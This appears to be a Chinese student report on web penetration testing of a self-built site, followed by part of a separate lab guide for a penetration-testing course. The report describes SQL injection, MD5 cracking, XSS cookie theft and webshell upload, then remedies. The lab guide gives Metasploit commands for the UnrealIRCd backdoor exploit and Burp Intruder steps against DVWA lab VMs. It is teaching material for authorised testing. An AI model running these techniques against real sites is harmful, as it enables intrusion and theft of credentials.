      根據(jù)一般的定義,網(wǎng)絡(luò)安全是指網(wǎng)絡(luò)系統(tǒng)的硬件、軟件及其系統(tǒng)中的數(shù)據(jù)受到保護(hù),不因偶然的或者惡意的原因而遭受到破壞、更改、泄露,系統(tǒng)連續(xù)可靠正常地運(yùn)行,網(wǎng)絡(luò)服務(wù)不中斷。要做到這一點(diǎn),必須保證網(wǎng)絡(luò)系統(tǒng)軟件、應(yīng)用軟件、數(shù)據(jù)庫(kù)系統(tǒng)具有一定的安全保護(hù)功能,并保證網(wǎng)絡(luò)部件,如終端、調(diào)制解調(diào)器、數(shù)據(jù)鏈路的功能僅僅能被那些被授權(quán)的人訪問。

      在現(xiàn)實(shí)世界中,由于網(wǎng)絡(luò)相關(guān)的各種軟硬件安裝、配置、管理上面基本不可能做到?jīng)]有任何缺陷和漏洞,所以可以說(shuō)不存在絕對(duì)的網(wǎng)絡(luò)安全。尤其在當(dāng)下網(wǎng)絡(luò)技術(shù)逐漸普及擴(kuò)散的情境下,防范各種形式的黑客攻擊是網(wǎng)絡(luò)資源管理者必須嚴(yán)肅考慮的問題。

      根據(jù)黑客攻擊的類型,大致可以分為兩種,一種是直接針對(duì)操作系統(tǒng)本身或應(yīng)用軟件的安全漏洞進(jìn)行的攻擊,傳統(tǒng)的注入端口掃描、弱口令爆破、緩沖器溢出都屬于這種類型的攻擊,如果攻擊成功往往可以直接遠(yuǎn)程控制目標(biāo)系統(tǒng),因此一旦出問題危害極大,但針對(duì)這種攻擊的防范技術(shù)也比較成熟,采用最新的安全操作系統(tǒng)、強(qiáng)大的防火墻和IDS入侵檢測(cè)系統(tǒng)可以將絕大部分入侵企圖拒之門外。另外一種就是針對(duì)動(dòng)態(tài)Web網(wǎng)站進(jìn)行的攻擊,它不像針對(duì)系統(tǒng)的攻擊那樣直接,成功后能在目標(biāo)系統(tǒng)上進(jìn)行的操作有限,往往還需要進(jìn)行提權(quán)等后續(xù)工作,但目前Web網(wǎng)站本身設(shè)計(jì)上的安全防護(hù)水平普遍不高,針對(duì)Web網(wǎng)站的防范措施目前也還不夠成熟,所以有安全問題的Web網(wǎng)站非常多,Web網(wǎng)站的攻防也是現(xiàn)在安全技術(shù)領(lǐng)域的研究熱點(diǎn)。

      1.2 Web網(wǎng)站面臨的威脅

      傳統(tǒng)上,網(wǎng)絡(luò)應(yīng)用業(yè)務(wù)采用C/S(客戶機(jī)和服務(wù)器)模式,即開發(fā)出安裝在普通客戶計(jì)算機(jī)上的遞交申請(qǐng)業(yè)務(wù)模塊和安裝在高性能服務(wù)器上的響應(yīng)請(qǐng)求業(yè)務(wù)模塊,這樣做的好處是性能高,響應(yīng)速度快,但缺點(diǎn)是需要為每個(gè)業(yè)務(wù)專門開發(fā)不同的服務(wù)端和客戶端,開發(fā)和學(xué)習(xí)的成本也高,所以現(xiàn)在的趨勢(shì)是將所有的服務(wù)模塊都放到Web網(wǎng)站上,而客戶機(jī)統(tǒng)一使用瀏覽器去訪問Web網(wǎng)站去實(shí)現(xiàn)業(yè)務(wù)功能。

      用Web網(wǎng)站形式開發(fā)網(wǎng)絡(luò)業(yè)務(wù)有不少優(yōu)點(diǎn),首先是客戶端統(tǒng)一為瀏覽器、降低了這方面的學(xué)習(xí)成本,另一方面,Web網(wǎng)站的主流開發(fā)語(yǔ)言(ASP、PHP、JSP等)是動(dòng)態(tài)腳本語(yǔ)

      言,比起用C/C++、Java等語(yǔ)言開發(fā)C/S程序,難度有所降低,有利于快速開發(fā)出所需的項(xiàng)目。但是從安全方面考慮,由于Web網(wǎng)站牽涉到的一些網(wǎng)絡(luò)協(xié)議先天的不足,以及由于網(wǎng)絡(luò)技術(shù)發(fā)展太快,網(wǎng)站復(fù)雜程度隨著需求擴(kuò)展不斷膨脹,而網(wǎng)站開發(fā)程序員的水平和安全意識(shí)往往沒有跟上,導(dǎo)致Web網(wǎng)站非常容易出現(xiàn)各種安全漏洞,使黑客能夠?qū)ζ溥M(jìn)行各種形式的攻擊,常見的Web安全漏洞主要有SQL注入和XSS跨站攻擊等。SQL注入

      SQL注入(SQL injection)是發(fā)生在Web應(yīng)用程序和后臺(tái)數(shù)據(jù)庫(kù)之間的一種安全漏洞攻擊,它的基本原理是:攻擊者精心構(gòu)建一個(gè)包含了SQL指令的輸入數(shù)據(jù),然后作為參數(shù)傳遞給應(yīng)用程序,在應(yīng)用程序沒有對(duì)輸入數(shù)據(jù)做足夠的檢查的情況下,數(shù)據(jù)庫(kù)服務(wù)器就會(huì)被欺騙,將本來(lái)只能作為普通數(shù)據(jù)的輸入當(dāng)成了SQL指令并執(zhí)行。

      數(shù)據(jù)庫(kù)是動(dòng)態(tài)網(wǎng)站的核心,包含了很多網(wǎng)站相關(guān)的敏感數(shù)據(jù),例如管理員的賬號(hào)和密碼等,所以一旦數(shù)據(jù)庫(kù)的信息被SQL注入非法查詢,這些敏感信息就會(huì)被泄露,導(dǎo)致嚴(yán)重后果。此外,SQL注入還可能被用于網(wǎng)頁(yè)篡改、網(wǎng)頁(yè)掛馬,更為嚴(yán)重的是,有些數(shù)據(jù)庫(kù)管理系統(tǒng)支持SQL指令調(diào)用一些操作系統(tǒng)功能模塊,一旦被SQL注入攻擊甚至存在服務(wù)器被遠(yuǎn)程控制安裝后門的風(fēng)險(xiǎn)。XSS跨站攻擊

      簡(jiǎn)單地說(shuō),XSS也是由于Web應(yīng)用程序?qū)τ脩舻妮斎脒^濾不嚴(yán)而產(chǎn)生,攻擊者利用XSS漏洞可以將惡意的腳本代碼(主要包括html代碼和JavaScript腳本)注入到網(wǎng)頁(yè)中,當(dāng)其他用戶瀏覽這些網(wǎng)頁(yè)時(shí),就會(huì)觸發(fā)其中的惡意腳本代碼,對(duì)受害者進(jìn)行諸如Cookie信息竊取、會(huì)話劫持、網(wǎng)絡(luò)釣魚等各種攻擊。

      與主動(dòng)攻擊Web服務(wù)器端的SQL注入攻擊不同,XSS攻擊發(fā)生在瀏覽器客戶端,對(duì)服務(wù)器一般沒有直接危害,而且總體上屬于等待對(duì)方上鉤的被動(dòng)攻擊,因此XSS這種安全漏洞雖很早就被發(fā)現(xiàn),其危害性卻曾經(jīng)受到普遍忽視,但隨著網(wǎng)絡(luò)攻擊者挖掘出了原來(lái)越多的XSS漏洞利用方式,加上Web2.0的流行、Ajax等技術(shù)的普及,使得黑客有了更多機(jī)會(huì)發(fā)動(dòng)XSS攻擊,導(dǎo)致近年來(lái)XSS攻擊的安全事件層出不窮,對(duì)XSS攻防方面研究的重視程度明顯提高。

      當(dāng)然,Web網(wǎng)站面臨的安全威脅還有很多,并且隨著網(wǎng)絡(luò)技術(shù)和網(wǎng)絡(luò)業(yè)務(wù)的發(fā)展而不斷更新,例如CSRF跨站請(qǐng)求偽造、界面操作劫持等。

      1.3 Web滲透測(cè)試概述

      由于各種安全漏洞,因特網(wǎng)上的Web網(wǎng)站面臨黑客攻擊的風(fēng)險(xiǎn),因此必須采取措施進(jìn)行防護(hù)工作。傳統(tǒng)防火墻因?yàn)楸仨毞判蠾eb服務(wù)的端口(一般是80端口),所以對(duì)SQL注 2

      入、XSS跨站攻擊之類入侵手段沒有防護(hù)效果,現(xiàn)在也出現(xiàn)了一些專門用于保護(hù)Web網(wǎng)站的安全設(shè)備,例如WAF防火墻、安全狗等,但這些設(shè)備并不是萬(wàn)能的,往往容易被高水平的入侵者繞過。最有效的措施還是進(jìn)行Web滲透測(cè)試。

      滲透測(cè)試時(shí)安全模擬黑客可能使用的攻擊技術(shù)和漏洞發(fā)現(xiàn)技術(shù),對(duì)目標(biāo)系統(tǒng)的安全做深入的探測(cè),發(fā)現(xiàn)系統(tǒng)最脆弱的環(huán)節(jié)。滲透測(cè)試能夠直觀的讓管理人員知道自己網(wǎng)絡(luò)所面臨的問題。

      Web滲透測(cè)試主要是對(duì)Web應(yīng)用程序和相應(yīng)的軟硬件設(shè)備配置的安全性進(jìn)行測(cè)試。進(jìn)行Web滲透測(cè)試的安全人員必須遵循一定的滲透測(cè)試準(zhǔn)則,不能對(duì)被測(cè)系統(tǒng)進(jìn)行破壞活動(dòng)。Web安全滲透測(cè)試一般是經(jīng)過客戶授權(quán)的,采取可控制、非控制性質(zhì)的方法和手段發(fā)現(xiàn)目標(biāo)服務(wù)器、Web應(yīng)用程序和網(wǎng)絡(luò)配置中存在的弱點(diǎn)。

      通過Web滲透測(cè)試后,即可有針對(duì)性地對(duì)Web網(wǎng)站上的安全漏洞進(jìn)行修補(bǔ),最大程度地加固系統(tǒng),確保安全。

      第二章 Web滲透測(cè)試方案設(shè)計(jì)

      2.1 滲透測(cè)試網(wǎng)站創(chuàng)建

      為了研究Web滲透測(cè)試技術(shù),我們需要一個(gè)測(cè)試用的Web網(wǎng)站,由于法律的限制,我們不能直接去攻擊互聯(lián)網(wǎng)上的Web網(wǎng)站,所以需要自己創(chuàng)建一個(gè)實(shí)驗(yàn)測(cè)試用Web網(wǎng)站,這樣不但合法,而且還有利于測(cè)試完成后做修補(bǔ)加固和代碼審核工作。

      測(cè)試Web網(wǎng)站可以創(chuàng)建在本地,也可以創(chuàng)建到自己購(gòu)買的虛擬空間或云主機(jī)上,為了方便起見,這里選擇在云平臺(tái)上的一臺(tái)Windows 2003虛擬機(jī)系統(tǒng)上創(chuàng)建Web網(wǎng)站。

      ASP、ASP.NET、PHP和JSP網(wǎng)站需要不同的環(huán)境,包括選用Apache、IIS、Nginx或者Weblogic中哪個(gè)Web服務(wù)器,數(shù)據(jù)庫(kù)也有Access、Microsoft SQL Server、MySQL以及Oracle等多種選擇。至于網(wǎng)站的源代碼,可以自己開發(fā),但一般更常見是到互聯(lián)網(wǎng)上去搜尋開源的Web項(xiàng)目下載,例如中國(guó)站長(zhǎng)網(wǎng)等,可以根據(jù)需求自己對(duì)網(wǎng)站源代碼進(jìn)行適當(dāng)?shù)牟眉粜薷?,也更好達(dá)到滲透測(cè)試目的。

      如圖2-1所示,這里選用了IIS+ASP方案創(chuàng)建了一個(gè)測(cè)試用Web網(wǎng)站。

      圖2-1 創(chuàng)建Web網(wǎng)站

      2.2 滲透測(cè)試工具選擇

      對(duì)Web網(wǎng)站進(jìn)行滲透測(cè)試的工作是在一臺(tái)能訪問Web網(wǎng)站的攻擊機(jī)上實(shí)施的,這些測(cè)試工作有些可以直接用手工操作,不過如果有適當(dāng)?shù)墓ぞ邘椭?,往往可以大幅度地提高滲 4

      透測(cè)試的成功率和效率,因此選擇一套滲透測(cè)試用的工具軟件是必備的工作,這些工具一般包括端口掃描器、網(wǎng)站目錄掃描器、網(wǎng)站后臺(tái)掃描器、網(wǎng)站漏洞掃描器、SQL注入工具、XSS利用工具、轉(zhuǎn)碼工具、加解密工具等等。

      如圖2-2所示,在本地攻擊機(jī)上安裝了一些常用的滲透測(cè)試工具。

      圖2-2 滲透測(cè)試工具

      2.3滲透測(cè)試方法

      準(zhǔn)備好測(cè)試用Web網(wǎng)站和滲透測(cè)試工具后,即可在攻擊機(jī)上開始進(jìn)行Web滲透測(cè)試工作,方法是模擬真正黑客的入侵過程,綜合利用各種工具和手段,獲取目標(biāo)Web網(wǎng)站甚至網(wǎng)站所在服務(wù)器上的權(quán)限,從而挖掘出網(wǎng)站的各種安全漏洞,為后面的安全加固提供依據(jù)。當(dāng)然,這需要很高的技術(shù)水平和熟練的操作,沒有多年的經(jīng)驗(yàn)積累是很難在各種情景下都能完成任務(wù)的,在下一章,我們就以一個(gè)比較簡(jiǎn)單的,漏洞比較明顯的Web網(wǎng)站為例演示一下比較典型的Web滲透測(cè)試過程。

      第三章 Web滲透測(cè)試過程

      3.1 掃描測(cè)試Web網(wǎng)站

      如圖3-1所示,滲透測(cè)試首先應(yīng)該先用Nmap之類的端口掃描工具掃描一下目標(biāo)網(wǎng)站所在的服務(wù)器,了解開放的端口服務(wù),目標(biāo)可能的操作系統(tǒng)類型等信息。這里可以看到,目標(biāo)服務(wù)器的80號(hào)端口是開放的,所以Web服務(wù)應(yīng)該是正常的。

      圖3-1 端口掃描

      然后用瀏覽器打開網(wǎng)站驗(yàn)證,如圖3-2所示:

      圖3-2 Web網(wǎng)站瀏覽

      3.2 尋找Web安全漏洞

      我們可以用一些自動(dòng)化的網(wǎng)站掃描工具去檢測(cè)網(wǎng)站的常見漏洞,也可以用純手工的方式進(jìn)行檢測(cè),如圖3-3和3-4所示,在網(wǎng)頁(yè)URL后面添加“and 1=1”和“and 1=2”,發(fā)現(xiàn)網(wǎng)站返回的情況不同!說(shuō)明這里存在著SQL注入漏洞。

      圖3-3 SQL注入測(cè)試

      圖3-4 SQL注入測(cè)試

      如圖3-5所示,在地址欄后面添加“ “> ”,彈窗窗口出現(xiàn),證明這里存在反射型XSS漏洞。

      圖3-5 反射型XSS 如圖3-

      6、3-7和3-8所示,在留言板里發(fā)表包含“ ”的帖子內(nèi)容,彈窗窗口出現(xiàn),證明這里存在存儲(chǔ)型XSS漏洞。

      圖3-6 留言板

      圖3-7 XSS留言

      圖3-8 存儲(chǔ)型XSS 3.3 SQL注入攻擊測(cè)試

      在上一節(jié)已經(jīng)找到Web網(wǎng)站的SQL注入漏洞的基礎(chǔ)上,我們利用此漏洞去猜解網(wǎng)站后臺(tái)數(shù)據(jù)庫(kù)中的賬號(hào)和密碼,既可以用工具也可以用手工方式,這里為方便起見選用注入工具,如圖3-9和3-10所示,很快猜解出賬號(hào)和密碼。

      圖3-9 工具掃描SQL注入漏洞

      圖3-10 注入找到后臺(tái)賬號(hào)密碼

      從密碼的形式可以看出不是明文而是原始密碼的MD5散列碼,MD5是單向散列函數(shù),本來(lái)是不能破解的,不過如果密碼原文比較簡(jiǎn)單,也可能用暴力破解的方式找到原密碼,如圖3-

      11、3-12和3-13所示。

      圖3-11 破解MD5

      圖3-12 破解成功

      圖3-13 破解出密碼原文

      有了賬號(hào)和密碼后,掃描網(wǎng)站的管理后臺(tái)地址,如圖3-14所示。

      圖3-14 掃描出管理后臺(tái)

      如圖3-15和3-16所示,用前面注入猜解和破解獲取的賬號(hào)和密碼登錄,成功進(jìn)入Web網(wǎng)站的管理后臺(tái)界面。

      圖3-15 登錄管理后臺(tái)

      圖3-16 進(jìn)入管理后臺(tái)

      3.4 XSS跨站攻擊測(cè)試

      前面已經(jīng)通過手工方式探測(cè)到網(wǎng)站存在XSS漏洞,XSS漏洞屬于一種比較被動(dòng)的安全漏洞,不能用來(lái)直接攻擊服務(wù)器,而是一部用來(lái)攻擊其他客戶端,具體利用的方法和形式很多,下面是利用XSS漏洞竊取管理員cookie的步驟。

      圖3-17 XSS利用平臺(tái)網(wǎng)站

      如圖3-17所示,XSS漏洞攻擊者自己創(chuàng)建一個(gè)具有XSS漏洞利用功能的網(wǎng)站,然后為自己創(chuàng)建一個(gè)項(xiàng)目,生成具有竊取cookie功能的代碼,如圖3-18所示:

      圖3-18 XSS利用代碼

      現(xiàn)在攻擊者可以設(shè)法利用各種欺騙手段讓其他Web網(wǎng)站用戶執(zhí)行XSS代碼,這里利用存儲(chǔ)型XSS漏洞,由攻擊者在留言板上發(fā)表包含XSS利用代碼的內(nèi)容插入網(wǎng)站數(shù)據(jù)庫(kù),如圖3-19所示。

      圖3-19 將代碼插入目標(biāo)Web網(wǎng)站

      如圖3-20所示,一旦Web網(wǎng)站的管理員在登錄狀態(tài)下查看了留言板,XSS利用代碼就 14

      在后臺(tái)隱蔽執(zhí)行了。

      圖3-20 管理員被攻擊

      此時(shí)攻擊者回到XSS網(wǎng)站,會(huì)發(fā)現(xiàn)自己的項(xiàng)目中返回了數(shù)據(jù),如圖3-21所示。

      圖3-21 攻擊者收到cookie

      如圖3-22所示,攻擊者竊取到了Web網(wǎng)站管理員的cookie信息。

      圖3-22 竊取到的cookie值

      如圖3-23和3-24所示,有了竊取到的cookie信息,再借助一些cookie修改工具,可以不輸入密碼直接進(jìn)入管理后臺(tái)界面。

      圖3-23 cookie修改工具

      圖3-24 竊取cookie進(jìn)入管理界面

      3.5 網(wǎng)馬上傳攻擊測(cè)試

      前面利用SQL注入漏洞拿到管理賬戶和密碼后可以非法進(jìn)入后臺(tái)管理界面,但到這來(lái)一般并不能做多少事,用后臺(tái)權(quán)限篡改新聞掛黑頁(yè)是很無(wú)聊的事情,常見的做法是想辦法將網(wǎng)頁(yè)木馬上傳到網(wǎng)站獲取Webshell得到網(wǎng)站所在服務(wù)器的某些權(quán)限,然后有需要和可能再設(shè)法提權(quán)。

      如圖3-25所示,在Web網(wǎng)站管理后臺(tái)里找到一個(gè)能夠上傳自己圖片的地方,然后選擇上傳文件,如圖3-26和3-27所示,直接上傳asp格式的網(wǎng)馬是通不過檢查的,所以上傳一個(gè)偽裝成圖片文件的小馬,結(jié)果成功上傳,并被自動(dòng)重命名,如圖3-28和3-29所示。

      圖3-25 上傳圖片

      圖3-26 選擇文件

      圖3-27 上傳網(wǎng)馬圖片

      圖3-28 上傳成功

      圖3-29 上傳文件位置和名稱

      現(xiàn)在網(wǎng)馬內(nèi)容上傳上去了,但文件后綴名不對(duì),所以不能訪問執(zhí)行,所以需要再利用類似如圖3-30所示的備份漏洞,將上傳的文件的后綴名成功改回asp。

      圖3-30 備份改名

      現(xiàn)在可以直接訪問上傳成功的網(wǎng)馬,如圖3-31所示是小馬的效果,利用它在上傳一個(gè)功能齊全的大馬,如圖3-32和3-33所示。

      圖3-31 訪問網(wǎng)馬

      圖3-32 上傳大馬

      圖3-33 訪問大馬

      現(xiàn)在可以直接訪問大馬網(wǎng)頁(yè)文件,如圖3-34所示,登錄成功后即得到類似圖3-35所示的Webshell界面,根據(jù)權(quán)限可以對(duì)Web網(wǎng)站所在的服務(wù)器進(jìn)行操作,如果有其他系統(tǒng)和軟件漏洞,還可以設(shè)法提權(quán),獲取對(duì)服務(wù)器的完全控制權(quán)。

      圖3-34 網(wǎng)馬登錄

      圖3-35 獲取Webshell

      第四章 Web網(wǎng)站防護(hù)

      4.1 網(wǎng)站代碼修復(fù)

      經(jīng)過Web滲透測(cè)試,我們發(fā)現(xiàn)了網(wǎng)站的安全漏洞及其嚴(yán)重后果,下一步自然就是部署安全防護(hù)措施,堵塞漏洞。

      對(duì)Web網(wǎng)站后臺(tái)代碼進(jìn)行閱讀審核后,可知正是因?yàn)榫W(wǎng)站查詢數(shù)據(jù)庫(kù)的SQL語(yǔ)句缺少必要的過濾措施才導(dǎo)致了SQL注入、XSS等安全漏洞。修補(bǔ)漏洞的最好辦法是用安全編碼方式徹底重寫所有相關(guān)代碼,如果沒有這個(gè)條件,添加一些過濾代碼也是比較好的辦法,例如圖4-1所示,在數(shù)據(jù)庫(kù)連接文檔中添加了對(duì)用戶提交值中非法參數(shù)的檢測(cè)。

      圖4-1 過濾代碼

      添加過濾代碼后,黑客如果再企圖對(duì)Web網(wǎng)站進(jìn)行諸如SQL注入之類的攻擊,就會(huì)被攔截而歸于失敗,如圖4-2所示。

      圖4-2 SQL注入被攔截

      需要注意的是,黑名單式的過濾代碼并不是萬(wàn)能的,往往會(huì)被更高水平的黑客攻擊繞過,所以還應(yīng)根據(jù)攻防技術(shù)的發(fā)展及時(shí)更新,并結(jié)合其他安全防范措施。

      4.2 其它防護(hù)措施

      因?yàn)楝F(xiàn)在的Web網(wǎng)站功能越來(lái)越多,也越來(lái)越復(fù)雜,相應(yīng)的黑客攻擊技術(shù)也在不斷發(fā)展,所以往往不是單一的安全防護(hù)措施就能有效抵御各種滲透攻擊,而需要綜合采用各種措施,一方面盡可能將所有的安全漏洞堵住,另一方面可以爭(zhēng)取做到即使黑客攻破了某個(gè)安全措施,也會(huì)被其他安全措施攔截,將損失降低到最小。

      目前比較常用的Web安全防范措施有:盡量選用高版本的操作系統(tǒng)Web服務(wù)器,設(shè)置高強(qiáng)度的密碼,給網(wǎng)站目錄設(shè)置最小的必要權(quán)限,加裝Web防火墻和殺毒軟件監(jiān)控網(wǎng)頁(yè)木馬等。

      最后需要指出,Web滲透和防護(hù)技術(shù)還處在快速發(fā)展階段,所以沒有一勞永逸的安全,必須不斷學(xué)習(xí),與時(shí)俱進(jìn)。

      總 結(jié)

      網(wǎng)絡(luò)安全是當(dāng)前的一個(gè)技術(shù)研究熱點(diǎn),Web安全又是網(wǎng)絡(luò)安全中的一個(gè)核心問題。Web滲透測(cè)試則是強(qiáng)化Web網(wǎng)站安全的重要技術(shù)手段,它是在獲得授權(quán)的情況下,模擬真實(shí)的黑客攻擊手段對(duì)目標(biāo)Web站點(diǎn)進(jìn)行入侵測(cè)試,因此能夠最大程度挖掘出Web網(wǎng)站的安全漏洞,為Web安全防護(hù)提供有效依據(jù)。

      本文是在真實(shí)網(wǎng)絡(luò)環(huán)境里自己搭建了一個(gè)Web網(wǎng)站,然后自己對(duì)其進(jìn)行滲透測(cè)試,研究Web安全相關(guān)攻防技術(shù)。限于水平,創(chuàng)建的Web網(wǎng)站和攻防所用的技術(shù)都比較簡(jiǎn)單,沒有涉及當(dāng)前最新的Web網(wǎng)站漏洞測(cè)試,但仍然比較完整地展示了Web網(wǎng)站滲透測(cè)試和防護(hù)的過程,為以后進(jìn)一步學(xué)習(xí)和工作打下良好基礎(chǔ)。

      參考文獻(xiàn)

      [1] 陳小兵,范淵,孫立偉.Web滲透技術(shù)及實(shí)戰(zhàn)案例解析 [M].北京:電子工業(yè)出版社,2012.4 [2] 王文君,李建蒙.Web應(yīng)用安全威脅與防治 [M].北京:電子工業(yè)出版社,2013.1 [3] 吳翰清.白帽子講Web安全 [M].北京:電子工業(yè)出版社,2012.3 [4] 鮑洪生.信息安全技術(shù)教程 [M].北京:電子工程出版社,2014.3 25

      第四篇:網(wǎng)絡(luò)安全與滲透測(cè)試訓(xùn)練營(yíng)

      《網(wǎng)絡(luò)安全與滲透測(cè)試訓(xùn)練營(yíng)》試驗(yàn)指導(dǎo)

      實(shí)驗(yàn)環(huán)境要求

      1,Windows操作系統(tǒng),推薦Windows 7 32位或者64位 2,至少有32GB空閑磁盤空間

      實(shí)驗(yàn)網(wǎng)絡(luò)搭建方式1(NAT網(wǎng)絡(luò))1,安裝Virtual Box虛擬機(jī)管理軟件

      2,啟動(dòng)Virtual Box的虛擬機(jī)管理器,點(diǎn)擊“管理 > 全局設(shè)定…”調(diào)出如下對(duì)話框,選擇“網(wǎng)絡(luò) > NAT網(wǎng)絡(luò)”頁(yè),如果列表為空,則點(diǎn)擊右側(cè)的+號(hào)圖標(biāo),讓列表中至少存在一個(gè)虛擬網(wǎng)絡(luò)。

      3,點(diǎn)擊“管理 > 導(dǎo)入虛擬機(jī)…”,選擇實(shí)驗(yàn)材料中的meta.ova文件,導(dǎo)入虛擬機(jī)。再選擇kali2016.ova導(dǎo)入Kali虛擬機(jī)。

      4,導(dǎo)入成功后,選擇Meta虛擬機(jī),點(diǎn)擊設(shè)置按鈕,切換到網(wǎng)絡(luò)頁(yè)面,將網(wǎng)絡(luò)選項(xiàng)改為下圖所示的Host only方式,并選擇上面創(chuàng)建的虛擬網(wǎng)卡。

      5,選擇Kali2016虛擬機(jī),重復(fù)上面一步設(shè)置網(wǎng)路。

      實(shí)驗(yàn)網(wǎng)絡(luò)搭建方式2(Host-Only網(wǎng)絡(luò))1.安裝Virtual Box虛擬機(jī)管理軟件

      2.啟動(dòng)Virtual Box的虛擬機(jī)管理器,點(diǎn)擊“管理 > 全局設(shè)定…”調(diào)出如下對(duì)話框,選擇“網(wǎng)絡(luò) > Host only”頁(yè),然后點(diǎn)擊右側(cè)的+號(hào)圖標(biāo),讓列表中至少存在一個(gè)虛擬網(wǎng)卡。

      3.點(diǎn)擊“管理 > 導(dǎo)入虛擬機(jī)…”,選擇實(shí)驗(yàn)材料中的meta.ova文件,導(dǎo)入虛擬機(jī)。再選擇kali2016.ova導(dǎo)入Kali虛擬機(jī)。

      4.導(dǎo)入成功后,選擇Meta虛擬機(jī),點(diǎn)擊設(shè)置按鈕,切換到網(wǎng)絡(luò)頁(yè)面,將網(wǎng)絡(luò)選項(xiàng)改為下圖所示的Host only方式,并選擇上面創(chuàng)建的虛擬網(wǎng)卡。

      5.選擇Kali2016虛擬機(jī),重復(fù)上面一步。

      試驗(yàn)1:理解MSF工作過程

      1,啟動(dòng)Kali2016虛擬機(jī)和Meta虛擬機(jī)

      2,在Meta虛擬機(jī)中用msfadmin/msfadmin登陸 執(zhí)行ifconfig,觀察和記錄IP地址

      3,在Kali虛擬機(jī)中使用如下用戶名和密碼登陸: 用戶名:root 密碼:advdbg 6,在Kali虛擬機(jī)執(zhí)行msfconsole啟動(dòng)MSF控制臺(tái) 7,在MSF控制臺(tái)中執(zhí)行如下命令:

      msf > use exploit/unix/irc/unreal_ircd_3281_backdoor msf exploit(unreal_ircd_3281_backdoor)> set RHOST <第2步看到的IP地址> msf exploit(unreal_ircd_3281_backdoor)> exploit

      8,等待exploit命令執(zhí)行成功后,在簡(jiǎn)單shell中,嘗試執(zhí)行l(wèi)inux命令:

      > ls > ps > echo “Your machine is mine now” > /var/www/abc.txt

      9,在Meta虛擬機(jī)中執(zhí)行如下命令觀察上面產(chǎn)生的文件:

      # ls /var/www # cat /var/www/abc.txt # sudo /var/www/abc.txt 10,不必關(guān)閉虛擬機(jī),下一個(gè)試驗(yàn)還需要。

      試驗(yàn)2:使用Armitage顛覆Linux服務(wù)器

      1,在Kali桌面的左側(cè)工具條上點(diǎn)擊Armitage的圖標(biāo)啟動(dòng)Armitage

      2,當(dāng)下面的連接對(duì)話框出現(xiàn)后,保持所有默認(rèn)內(nèi)容,點(diǎn)擊Connect按鈕,讓其與MSF后臺(tái)服務(wù)進(jìn)程自動(dòng)建立連接。

      3,如果出現(xiàn)下面的詢問是否啟動(dòng)MSF的對(duì)話框,則點(diǎn)擊Yes讓Armitage自動(dòng)啟動(dòng)MSF后臺(tái)服務(wù)。

      4,如果出現(xiàn)下面的對(duì)話框,表示啟動(dòng)MSF時(shí)鏈接數(shù)據(jù)庫(kù)失敗。解決的方法是安裝提示,開啟一個(gè)終端窗口(工具欄上有按鈕),在其中執(zhí)行service postgresql start,然后再重新啟動(dòng)Armitage。

      5,Armitage的主界面出現(xiàn)后,選擇”Hosts > Add Host…”調(diào)出增加主機(jī)對(duì)話框,輸入Meta虛擬機(jī)的IP地址,然后點(diǎn)擊確定后,Armitage的主機(jī)列表區(qū)域應(yīng)該出現(xiàn)一個(gè)下新的圖標(biāo)。右擊該圖標(biāo),在右鍵菜單中選擇Host > Set Label,給其設(shè)定個(gè)名字,叫Meta。6,選中Meta主機(jī),然后在Armitage的主菜單中選擇Attacks > Find Attack發(fā)起漏洞掃描。

      7,等待掃描完成后,右鍵點(diǎn)擊Meta主機(jī)圖標(biāo),調(diào)出快捷菜單,選擇Attack > irc >

      8,觀察Armitage執(zhí)行攻擊腳本的過程,等待其結(jié)束,如果出現(xiàn)如下界面,則表示成功顛覆了目標(biāo)主機(jī)。

      9,右鍵點(diǎn)擊Meta主機(jī)圖標(biāo),選擇Shell 1 > Upload…選取一個(gè)本地文件后,Armitage會(huì)將其上傳到被顛覆的主機(jī)。

      10,右鍵點(diǎn)擊Meta主機(jī)圖標(biāo),選擇Shell 1 > Interact,然后在shell窗口中執(zhí)行常用的Linux命令。

      11,關(guān)閉Armitage結(jié)束本實(shí)驗(yàn)。

      試驗(yàn)3:使用Burp Suite的Intruder功能

      1,啟動(dòng)Kali2016虛擬機(jī),在左側(cè)的工具條上點(diǎn)擊Burp Suite(以下簡(jiǎn)稱Burp)的圖標(biāo),啟動(dòng)Burp。選擇默認(rèn)選項(xiàng),進(jìn)入Burp主界面。2,點(diǎn)擊Proxy > Intercept,確認(rèn)代理功能的攔截選項(xiàng)是打開的,即如下圖所示Intercept is on.3,點(diǎn)擊工具欄上的Firefox圖標(biāo),啟動(dòng)Firefox瀏覽器,點(diǎn)擊工具欄最右側(cè)的Open menu按鈕,調(diào)出Firefox的管理頁(yè)面,選擇Advanced > Network > Settings調(diào)出下圖所示的Connection Settings對(duì)話框,然后按照下圖內(nèi)容設(shè)置啟用代理選項(xiàng)。點(diǎn)擊OK關(guān)閉對(duì)話框。

      4,在瀏覽器地址欄中輸入Meta虛擬機(jī)的IP地址,比如10.0.2.6/dvwa,訪問上面的DVWA網(wǎng)站。此時(shí)會(huì)感覺瀏覽器異常緩慢,打不開網(wǎng)頁(yè),這是因?yàn)榫W(wǎng)絡(luò)請(qǐng)求被Burp攔截住了,按下Alt + Tab鍵切換到Burp窗口,點(diǎn)擊下圖所示的Forward按鈕,讓其放行所攔截網(wǎng)絡(luò)數(shù)據(jù)。可能需要點(diǎn)擊多次才能看到瀏覽器打開網(wǎng)頁(yè)。

      5,點(diǎn)擊上圖中的Intercept is on按鈕,使其變?yōu)镮ntercept is off,關(guān)閉攔截功能。

      6,以admin為用戶名,password為密碼登陸DVWA網(wǎng)頁(yè),點(diǎn)擊右側(cè)菜單條的Security,將security level改為low,點(diǎn)擊Submit

      7,選擇XSS reflected切換到下圖所示的XSS頁(yè)面,在文本編輯框中輸入你的名字,點(diǎn)擊Submit,了解剛頁(yè)面的基本行為。

      8,在文本編輯框中輸入如下帶有腳本的內(nèi)容:aa,點(diǎn)擊Submit,確認(rèn)看到下圖所示的對(duì)話框,說(shuō)明該網(wǎng)站存在XSS漏洞。

      9,按下Alt + Tab鍵切換到Burp界面,點(diǎn)擊Target > Site map,然后在左側(cè)的樹形控件中瀏覽Burp記錄的上網(wǎng)記錄,找到上面訪問xss_r頁(yè)面的記錄,點(diǎn)擊右鍵,選擇Seng to Intruder.10,選擇Intruder > Positions頁(yè)面,先點(diǎn)擊Clear $按鈕清除所有自動(dòng)定義的變量,再選中下圖中的raymond區(qū)域,然后點(diǎn)擊Add $增加一個(gè)變量。

